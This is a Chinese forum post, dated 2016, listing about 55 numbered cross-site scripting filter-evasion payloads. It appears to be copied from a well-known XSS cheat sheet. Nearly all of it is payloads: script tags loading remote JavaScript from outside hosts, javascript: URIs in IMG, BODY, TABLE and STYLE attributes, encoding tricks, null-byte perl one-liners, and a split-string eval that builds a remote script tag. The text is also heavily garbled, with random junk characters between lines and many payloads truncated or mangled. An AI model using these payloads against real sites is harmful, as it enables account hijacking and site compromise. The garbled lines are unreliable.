(1)普通的XSS JavaScript注入
- X o: s1 t1 R* S8 F5 m! q<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>0 k7 j2 C/ P0 ?
(99)另类弹框 O. e3 [( F3 {4 N# s1 t6 a
<q/oncut=alert()>1
+ q, }+ w# Q. c9 C<s/onclick=alert()>b
. I: c5 i& f2 J2 E <XSS=" onclick="alert(1)//">clickme</SSX=">0 W' Z8 B( U6 w$ a" O3 N! l# B
<zzz onclick=alert`1`>clickme</zzz> + |2 o! B/ u5 G) r1 ~; N$ `
<a onclick=alert`1`>clickme</a>
0 S5 E2 [% \) r! x' P- L. z<a=">clickme</a=">6 D/ Q6 s1 v- S+ s1 f# V
<a=">clickme</a>% Y0 ?7 e1 _: y& I D$ ?0 g
<z=">clickme</z=">4 N. G3 _; v, |0 z, i- s6 s
<z onclick=alert`1`>clickme</z>1 O3 ]; t% n/ A* P
4 z% F' {- R$ M# }6 w, _(2)IMG标签XSS使用JavaScript命令
Q2 P7 p$ g1 y2 y4 ~6 S2 @, X<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 e3 y/ K2 d/ ]7 r$ N- x
3 {" I: ^3 W! q4 v& `0 `(3)IMG标签无分号无引号
* U- W% L8 v8 n9 ]<IMG SRC=javascript:alert(‘XSS’)>/ S: n* K4 J* v% L5 K
, C! W2 f0 n, R(4)IMG标签大小写不敏感/ z+ k7 S! }2 f% x9 `
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
. ] s, \4 Y5 l; [% u5 s& {9 a, u- \6 c' h! S7 M& w0 c9 J
(5)HTML编码(必须有分号)
/ S3 M% M* a# S<IMG SRC=javascript:alert(“XSS”)>
+ i+ b) B( @9 ^8 i) U
8 w0 n$ m1 N% S3 ^; I9 H$ M- Z(6)修正缺陷IMG标签: X2 {) c+ k5 w s* e3 G
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
1 s% C! F; C/ j ~7 @' x, v) |
" I: l% q: V6 w# g( C(7)formCharCode标签(计算器)
0 E0 V# z+ ~$ N* B<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
. X, }6 {% O9 T* R' K" ?! C; y5 x8 W. V% Z* c1 @3 U0 v
(8)UTF-8的Unicode编码(计算器)8 ^; X E1 d9 U6 ]
<IMG SRC=jav..省略..S')>
* P4 x1 Y# w; T! b& Z* s4 D' T! V: Y, ]9 W+ K" g" G) ~2 D) p
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)9 k$ L2 U, ]1 L, u# D9 w: Z
<IMG SRC=jav..省略..S')>
4 n, n2 Q& | D6 ]: ?) H( }% ~& O0 s
(10)十六进制编码也是没有分号(计算器)
7 B P/ y1 [- [8 `: B<IMG SRC=\'#\'" /span>
$ Z+ \# d0 h2 ]7 y; o5 d# a. \7 i
/ K$ Q6 v- B6 h2 e- l" c6 N2 f6 a(11)嵌入式标签,将Javascript分开
- { S: F+ D; E9 a+ r<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
' S: v5 ~- F) \
- ^3 S4 {: n2 \4 Y1 m(12)嵌入式编码标签,将Javascript分开
{7 z: j, h+ s h<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
/ {. V4 j# Y1 G% i) N
# U: w1 S1 F' ^( H* W5 q% G: J(13)嵌入式换行符
# h( _1 a) d/ {: [7 w: ?! q9 n1 \<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
# u$ o8 t) }- h* e& s& |( a) D. S. T
(14)嵌入式回车
6 C! K1 R) K% |0 ^<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>+ g& W, |( e: |. A- `9 P; f
2 d* K5 p, ], y2 y2 M' ]7 N) h(15)嵌入式多行注入JavaScript,这是XSS极端的例子
. K% ]6 S: z1 A; o, R4 R4 [<IMG SRC=\'#\'" /span>; x M+ _4 z% `
7 G% {, S$ K; N0 c# E- e(16)解决限制字符(要求同页面)
3 j. m4 ?2 `! F, I+ x* g6 t6 X( T- ]3 f<script>z=’document.’</script>( p& | o+ Y# o) A
<script>z=z+’write(“‘</script>
% J6 e( @ Y! x6 b<script>z=z+’<script’</script>) j/ _3 ]# v" @) F# E
<script>z=z+’ src=ht’</script>2 e8 u' V9 E; p
<script>z=z+’tp://ww’</script>& D7 a+ q8 Y1 Y) u: ?* F7 v% T
<script>z=z+’w.shell’</script>
% e- s) w+ b) `! R6 C4 J<script>z=z+’.net/1.’</script>2 C2 z ?0 j- P
<script>z=z+’js></sc’</script>8 \: v5 @! @" g2 _
<script>z=z+’ript>”)’</script>! R/ K2 C W: S3 ]1 U: X" F
<script>eval_r(z)</script>
5 P, _4 U- y: \1 M1 Y6 B y0 \0 p6 D m
(17)空字符
/ I+ \1 }, G9 f: t5 u" o- }! |* sperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out% P1 _) t2 f4 b; L) w3 N' W+ D
Q" \3 _& T+ H$ S4 z(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
7 l: a+ m: ^5 D- `# W/ d4 yperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
3 W3 c! }( }# m$ y) S5 C9 t: G; n( `1 f3 u) U7 v" H8 L, q
(19)Spaces和meta前的IMG标签9 D& k! ]" C0 V) K; Q* m U5 a
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”> Z* Z7 G( e6 p- p3 [- i
! Y7 A% h8 b" M8 ?
(20)Non-alpha-non-digit XSS) |- L y, ]$ I% B* \1 B' D
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
2 v3 h' N6 K. z: z( j6 \- T5 h8 z
(21)Non-alpha-non-digit XSS to 2
, c+ M9 X: j/ D/ W( P<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>; x7 M+ P# n4 { L$ Y$ Y3 b& H
+ N" H' l* }3 h(22)Non-alpha-non-digit XSS to 3% W9 h/ i+ `0 U' a3 ?9 ]
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
: P4 ^* E; y3 o" O
5 X$ x' M* k& ]9 Y9 {- z(23)双开括号
' a0 U3 N# D8 A<<SCRIPT>alert(“XSS”);//<</SCRIPT>
* v* i( u$ N3 l6 b' \* q; ~+ h
* \0 c/ d2 t; [) ?' k2 m4 ?(24)无结束脚本标记(仅火狐等浏览器)2 X9 J, y/ O" p$ I
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
# T7 {8 M' h% v' ~# Y* D
$ G) ?2 V7 t0 X: }* B0 u(25)无结束脚本标记28 ?, E) S% Q. y
<SCRIPT SRC=//3w.org/XSS/xss.js>; {; t* `- d7 C) [
2 I: P$ f- Z5 `! J(26)半开的HTML/JavaScript XSS
O. g9 Q& s: V<IMG SRC=\'#\'" /span>1 S( R& Z. Y+ }& z; t- A
" X% C5 E0 E: k* I(27)双开角括号
- I. a b' p5 q9 ]4 m' W5 A<iframe src=http://3w.org/XSS.html <
1 u& k1 ^% F5 c
3 m8 A+ k5 `1 K4 a(28)无单引号 双引号 分号
; p. Y, C! l* |: S3 G<SCRIPT>a=/XSS/
/ `) M- s" {2 j' A& M* {" qalert(a.source)</SCRIPT>% l; A: `2 _5 g$ l5 U, J$ ?
* G, Y: p7 T+ H) a4 f N) {
(29)换码过滤的JavaScript' w' R2 z% K* G
\”;alert(‘XSS’);//
+ h; e1 V0 X9 l& `$ M- L' x; l0 t, b) H+ E3 j9 l
(30)结束Title标签
& F" P8 F' z3 U9 D6 i6 Q9 L</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>% n8 k5 C3 I$ x# l
; X. r; L8 J% a5 f2 A2 G(31)Input Image9 W! `6 g; i* L- s& I" \/ f
<INPUT SRC=\'#\'" /span>
- o0 X" X( J3 Z& w; h8 M
`/ F' {* o+ P% C& {0 x(32)BODY Image
# y! S7 Q/ i; Z& A' z" k<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 P- i) a9 `% e; y2 V/ ]: e5 {1 T/ s% n
(33)BODY标签
: R& ]5 [. @7 j% f: H* [2 G' K<BODY(‘XSS’)>
+ I7 p( r! a9 O- D* l' e
, s7 P* ?: I& \5 I0 [(34)IMG Dynsrc' F& T7 z0 t; q" v8 g6 \! O- L
<IMG DYNSRC=\'#\'" /span>8 w. E2 G; o7 a5 ~3 I
" I7 K. l9 V5 X% r. q6 C0 }& W( U
(35)IMG Lowsrc
* s5 } r0 C# b& V<IMG LOWSRC=\'#\'" /span>4 W) {3 H$ }& k$ W- Y+ E) a" Q4 o
+ E# W& T0 ~7 ?5 ?, T(36)BGSOUND+ l" Q* _$ h8 {' t( c, V
<BGSOUND SRC=\'#\'" /span>
$ {0 r4 l6 ?4 _4 F3 U& I, p7 q5 U) c- k) K3 q2 u9 b
(37)STYLE sheet
& [; P0 ~* n% W" _<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
. D# ^5 S( ^6 U$ z& n8 ^% \5 j% [. q
$ |7 p$ [8 v2 u5 T3 i(38)远程样式表
* {2 ?# D' O; _/ o# E- Z& g! P z<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
; Q S) [1 k8 D: w- Z1 s$ h
/ n5 e Q$ U) E# s$ }2 \(39)List-style-image(列表式)6 e1 w* r6 |7 y; x l" g
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS; y6 ]* S; Y& s( d$ T9 O
0 d$ `9 F. L# Q
(40)IMG VBscript- p5 _9 s4 z! q" M5 M9 j( I* J
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
0 q# w9 W$ S% z8 r( @" Z, h7 D/ M# }
% @2 `9 U& i7 Z7 N% p+ ]" k$ A; T- k(41)META链接url& x% w1 {- i; {* W7 }
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
" K4 v/ \3 Y, t8 j9 R
' ^5 }9 W" `8 q7 ?(42)Iframe2 N& R) k4 \1 i6 e% o
<IFRAME SRC=\'#\'" /IFRAME>
+ R* p7 r. ~ j2 S c
) K2 `7 Q, d: `4 [2 M! D(43)Frame
1 r |6 @$ t; a1 V) Y7 J<FRAMESET><FRAME SRC=\'#\'" /FRAMESET># R4 W( Q+ m. R3 C7 J+ M8 O
3 O* t1 ` U& H2 U% @(44)Table8 A2 r+ G/ V9 d3 B( D/ ]
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
5 Y. X8 l2 V6 o" ?7 e( I" Y: i% r3 t5 h
(45)TD9 O1 D8 e$ Z& z' A+ ~% e( g) Y5 T
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
- p# c5 E! I- n7 q! t y2 C/ e) q) X; _9 }+ B' Z3 o
(46)DIV background-image% N3 B# L; E4 T
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>2 k2 [+ b/ q! p P
+ e/ T# x+ j3 [: Z7 Q(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
- ?) F# J6 a/ q9 l. _7 }<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>6 j& B. z2 r! F, M4 e
" ]: o4 b/ k8 |8 v4 z. B) y
(48)DIV expression) u" c5 |1 E$ T( M* d
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>/ m6 E y" |! j) {6 g) S @; q
7 r7 @) x: v% o% c2 U! ?2 X- N(49)STYLE属性分拆表达
' X% Z) h; T4 S- u$ ?<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>! t9 Z8 r2 a+ q6 }
5 s8 G, v! w1 B$ o" K4 J( H' C(50)匿名STYLE(组成:开角号和一个字母开头)2 V' V* c" S' x" V3 a7 ?
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
8 w- o( D7 l; E: @6 G
9 }2 s2 j' |$ c0 i(51)STYLE background-image+ d4 R% V# u0 ?
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
) ~6 {; ?% {* p4 x! ?4 w# [: m7 n. C
(52)IMG STYLE方式/ p: @. m0 o" }7 ^4 M
exppression(alert(“XSS”))’>, V) B- X3 |. a2 G
. o1 [/ L/ \$ U. S/ V& S(53)STYLE background
/ ~. s1 V2 g, V0 h/ k<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
$ B# O. C9 j4 x* W2 O; B# x3 `% N! R2 S8 E4 K9 |
(54)BASE% n5 z5 _5 ?7 _
<BASE HREF=”javascript:alert(‘XSS’);//”>& N8 o1 N: B7 D7 C
: S8 R ^$ B$ g2 g2 Z: E(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS8 G6 ? P, Y6 F. S K
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
- W/ q2 Q- P5 s( I |
发表于 2016-4-28 10:06:15
收藏
支持
反对